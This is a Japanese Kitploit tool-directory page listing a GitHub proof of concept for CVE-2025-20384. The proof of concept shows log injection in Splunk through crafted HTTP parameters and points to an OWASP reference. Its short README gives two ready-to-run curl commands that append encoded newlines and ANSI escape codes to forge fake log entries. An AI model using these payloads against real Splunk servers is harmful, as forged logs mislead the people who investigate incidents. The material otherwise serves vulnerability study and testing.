Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-20384 — Splunkにおけるログインジェクション/フォージェリを、細工されたHTTPパラメータを介して実証する概念実証です。OWASP Log Injection攻撃に関する教育的な参考文献を伴います。 | Kitploit
ツール/GitHubGitHub/axselll/cve-2025-20384
脆弱性分析エクスプロイトウェブセキュリティペネトレーションテスト学習と教育ログ分析
GitHubaxselll/cve-2025-20384

CVE-2025-20384

Splunkにおけるログインジェクション/フォージェリを、細工されたHTTPパラメータを介して実証する概念実証です。OWASP Log Injection攻撃に関する教育的な参考文献を伴います。

リポジトリを見る
8ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

SPLUNK CVE-2025-20384

なぜか知らないけど、友達が送ってきたものを読んで、適当なJavaScriptコードを打ち始めた。

Log Injection/Forgery/Poisoning/Obfuscate type POC

この記事をお読みください OWASP Log Injection

TL;DR

  • 静的ファイルを探し、それを渡してランダムなパラメータを追加する
  • そこで、以下のように実行する。curl -k "https://localhost:8000/en-US/static/app/search/application.css%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----" または curl -k "https://localhost:8000/en-US/static/app/search/application.css%1B[31mANSI_TEST_RED%1B[0m%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----"
  • ランダムな改行が表示された場合、それはポイズニングです。単なる「普通の」ポイズニングなので問題ないように感じるかもしれませんが、標的にされると厄介です。

参考

CVEレコードへのリンク

ツールをダウンロード